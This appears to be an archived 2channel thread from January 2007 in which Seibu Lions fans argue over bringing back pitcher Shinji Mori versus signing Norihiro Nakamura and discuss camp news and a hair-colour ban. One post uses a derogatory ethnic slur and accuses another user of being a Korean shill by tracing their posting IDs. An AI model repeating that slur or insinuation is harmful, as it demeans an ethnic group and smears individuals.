427 :代打名無し@実況は実況板で:2007/01/20(土) 11:12:37 ID:n57niyd40
どう考えても、ノリの手首の方が慎二の肩より軽症な気がするのだが。

428 :代打名無し@実況は実況板で:2007/01/20(土) 11:15:06 ID:u1LSCBiv0
集客面でも戦力面でも、森よりノリ獲った方が有益だよな。
年俸もどっこいどっこいだろ?

429 :代打名無し@実況は実況板で:2007/01/20(土) 11:15:31 ID:6FSaBWHy0
ノりが投手だったら良かったね

430 :代打名無し@実況は実況板で:2007/01/20(土) 11:18:57 ID:u1LSCBiv0
>>429
一軍でそれなりでも打てる野手>一軍で投げられない投手

投手って肩書きがついてるだけでいいなら戦力外の投手かき集めればいいじゃん。

431 :代打名無し@実況は実況板で:2007/01/20(土) 11:22:58 ID:6FSaBWHy0
もぎたてさんがんばってんなぁ

432 :代打名無し@実況は実況板で:2007/01/20(土) 11:29:03 ID:eSg/PLfp0
ttp://www.sponichi.co.jp/baseball/flash/KFullFlash20070120011.html
とりあえずマイナー再契約の道は残ってるらしい

433 :代打名無し@実況は実況板で:2007/01/20(土) 11:53:25 ID:ucherVRD0
なんか最近空白レス増えてない?
このスレ3分の1くらい空白だったんだが…

434 :代打名無し@実況は実況板で:2007/01/20(土) 11:57:53 ID:PzsoiCol0
工作員が多いからね。
どうしても話題の人を入団させたいらしい。

>>423
マゲを結うとかしてどうにか

435 :代打名無し@実況は実況板で:2007/01/20(土) 12:00:18 ID:ucherVRD0
>>434
やっぱりそうだったのか!NDワードに引っかかったのかな。
でも3分の1も工作員がいるの?それとも普通の人がその話題に乗ってるの?

436 :代打名無し@実況は実況板で:2007/01/20(土) 12:11:51 ID:u1LSCBiv0
ノリなんかどうでもいい。
投手事情が苦しくて大沼の手も借りたい時に無理を通して出て行った森に
戻って来い戻って来い言ってる奴が気に入らんだけだよ。
自分を振って、別の男とくっついた女が破局したのを見て
可愛そうだ俺の元へ戻って来いって言ってるようでキモい。

437 :代打名無し@実況は実況板で:2007/01/20(土) 12:24:26 ID:adgVOqer0
森自身に西武でやる気があって
球団に森の面倒を見る気があるなら獲得すればいいんじゃない

それだけの話だよ
ヒステリックに感情をぶちまける理由がわからない

438 :代打名無し@実況は実況板で:2007/01/20(土) 12:27:53 ID:/cXB7BEI0
>>437
まあそういうレベルで思う人はそれでいいんじゃない
でもファンなんだから、誰を獲って欲しいか欲しくないか、それで色々と言いたい人がいるのは当たり前
自分の感覚を押し付けてはいけない

439 :代打名無し@実況は実況板で:2007/01/20(土) 12:28:57 ID:adgVOqer0
色々言いたくなるのは結構だが
感情論をぶちまいてもしょうがないし、人格攻撃なんてのは論外じゃないの

440 :代打名無し@実況は実況板で:2007/01/20(土) 12:31:05 ID:/cXB7BEI0
>>439
行き過ぎはよくないが、あなたの言ってるのはただの傍観者レベルのスタンスだったので
人格攻撃はアレだけど、感情論くらいはいいと思う

441 :代打名無し@実況は実況板で:2007/01/20(土) 12:32:27 ID:u1LSCBiv0
>>439
人格攻撃ってノリのことか?

森についてなら
「かわいそうだ、面倒見てやれ」
「あんな裏切り者要らない」
って感情論のぶつけ合いになるのは当然だろ。

442 :代打名無し@実況は実況板で:2007/01/20(土) 12:32:28 ID:adgVOqer0
>>440
確かに傍観者すぎたかもしれない

でもなんで森をそこまで拒否するのか理解できないんだよね
西武時代は応援してたし、また西武で頑張るならそれでいいんじゃない?って感覚だ

工作員かもしれんけど

443 :代打名無し@実況は実況板で:2007/01/20(土) 12:33:40 ID:adgVOqer0
>>441
>自分を振って、別の男とくっついた女が破局したのを見て
>可愛そうだ俺の元へ戻って来いって言ってるようでキモい。

これなんて自分のイメージで
森許容派の人格を攻撃してるようにしか見えないけど

444 :代打名無し@実況は実況板で:2007/01/20(土) 12:37:04 ID:u1LSCBiv0
>>443
ああ、選手じゃなくて、ファン同士の人格攻撃ってことか。
「森要らないって言ってるやつは氏ね」ってレスを2つは見たぞ。

工作員扱いも人格批判だな。
あんたは、清原や土肥や豊田が戦力外になって戻ってきても応援できる人なんだろうが
そうじゃない人もいるんだよ。

445 :代打名無し@実況は実況板で:2007/01/20(土) 12:40:44 ID:adgVOqer0
○ オレは許せない
× 許せるやつはおかしい、ありえない

ってことだよ
ま、いいか

446 :アンチ野球には三国人の方も居るみたいですね:2007/01/20(土) 13:02:04 ID:YLZexWIw0
http://stick.newsplus.jp/id.cgi?bbs=mnewsplus&word=FjUo9HpT0

【音楽】金正日総書記、小沢征爾氏に北朝鮮国立交響楽団の指揮者を要請、断られる[01/17][1件]

287 : 名前:名無しさん@恐縮です E-mail: 投稿日:2007/01/18(木) 05:23:34 ID:FjUo9HpT0
正日は日本国は嫌いかもしれんが
人は好きなはず、製品も

       
          ↓   そして、今日は・・・

http://stick.newsplus.jp/id.cgi?bbs=mnewsplus&word=ZOcb6bmm0

          
          ↓    途中でID変えちゃうよ

http://stick.newsplus.jp/id.cgi?bbs=mnewsplus&word=KwR31UrQ0

普段ならサッカー煽りに対して、野球プギャーレスの筈が何故か・・・
俺が後でIDを検索することを意識してか、やたら日本LOVEを強調するw
他のスレとの論調の違いに注目w

448 名前:名無しさん@恐縮です[] 投稿日:2007/01/20(土) 08:39:50 ID:KwR31UrQ0
>>444

現実生活では黙ってるけど
こういうところでは心の中で思ってること言えるからね
俺は韓国 北朝鮮に負けるのは絶対いやだ
ワールドカップとU17アジアカップで勝ったときはうれしかった


あ   や   し    い   ね   w

447 :代打名無し@実況は実況板で:2007/01/20(土) 13:23:53 ID:8Vg8zSd70
それより、森が戻ってきて以前のようなポテンシャルは無理だろ・・・

いらねーよ

448 :代打名無し@実況は実況板で:2007/01/20(土) 13:29:28 ID:ucherVRD0
育成とかならいいんじゃないの?使えたら儲けものだし。
森は金なら困ってないだろうから、安く。現実的にはあり得ないけど。

449 :代打名無し@実況は実況板で:2007/01/20(土) 13:41:23 ID:7CyfMvKHO
しかしライオンズ本スレはファン同士の言い争いが大好きだよな
論破してやるぜ、みたいな

>>447
ポテンシャル…?

450 :代打名無し@実況は実況板で:2007/01/20(土) 13:55:10 ID:uZeJO0VT0
活躍してくれた選手は大事にしないと良い選手が入ってきてくれない。

451 :代打名無し@実況は実況板で:2007/01/20(土) 14:16:50 ID:gQ32i6J90
無死満塁
右打者 岩崎 三振
左打者 星野 三振
右打者 正津 被弾

これだな


452 :代打名無し@実況は実況板で:2007/01/20(土) 14:17:30 ID:ucherVRD0
>>449
そうなの?荒らしは放置プレーが一番だと思ってた。
論破というより納得してほしいっていう一心だと思うよ。
「納得はしたけど賛成はできない」みたいな言葉で満足するんだと思う。

453 :代打名無し@実況は実況板で:2007/01/20(土) 14:18:54 ID:Sbp/GyzZ0
>>451
そして敗戦処理の大沼が火に油を注ぎ、やぶれかぶれの長田が消し炭になるんだなw

454 :自主トレ@宇都宮:2007/01/20(土) 14:29:57 ID:RlSOKULrO
午前野球教室
午後キャッチボール、内野ノック
このあとバッチング練習

455 :代打名無し@実況は実況板で:2007/01/20(土) 14:31:33 ID:RlSOKULrO
バッピーは小野寺さん

456 :代打名無し@実況は実況板で:2007/01/20(土) 14:34:25 ID:xH1flxRnO
茶髪、ロン毛禁止になったらしいね。これらはシーズン中ずっとってことだよね?
岩崎がフォーク取得するらしい。すごく期待してる

457 :代打名無し@実況は実況板で:2007/01/20(土) 14:43:51 ID:kIArLK4FO
>>447
×ポテンシャル
〇パフォーマンス

458 :代打名無し@実況は実況板で:2007/01/20(土) 14:43:57 ID:Sbp/GyzZ0
記憶が確かなら、去年の開幕前も茶髪ロングヘアー禁止と言ってたぞ。
平尾とか松坂とか、結局シーズン中には有耶無耶になってたから、どうせ今年もそんな感じでしょ。

459 :代打名無し@実況は実況板で:2007/01/20(土) 15:08:17 ID:Q0OSb+WLO
巨人じゃねーんだから・・・
禁止する意味がわからん。

460 :代打名無し@実況は実況板で:2007/01/20(土) 15:10:45 ID:w3IiD+OF0
録画しておいた名球会の番組みたけど
元西武組面白いな

461 :代打名無し@実況は実況板で:2007/01/20(土) 15:42:30 ID:j5GfaF030
罰金って言う以上本気っぽいが
じゃあ自分のヒゲは?って思うがね
うちは髪とか自由にやれるから
みんな目立ってた、面とかあると思ってるんだが

462 :代打名無し@実況は実況板で:2007/01/20(土) 15:57:50 ID:MvJMQ5lo0
>>461
バカじゃねえの。
キャンプインからだろ。
しかも監督は去年も今までもオフ以外ではきちんとヒゲを剃っていたが。

優勝すれば、長髪も金髪も茶髪もいいんだから頑張ればいい。
3年も優勝してないんだから今まで通りじゃ張り合いないよ。
これでいい。目立つのはまずプレーからでいい。
見た目は優勝して、おいしい思いしてからだ。

463 :代打名無し@実況は実況板で:2007/01/20(土) 15:58:46 ID:xH1flxRnO
和田さんに気を使ってのこと

464 :代打名無し@実況は実況板で:2007/01/20(土) 16:00:18 ID:Sbp/GyzZ0
>>462
言い分は一理あるのだが、なんでそんなに偉そうなのか少々

103 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)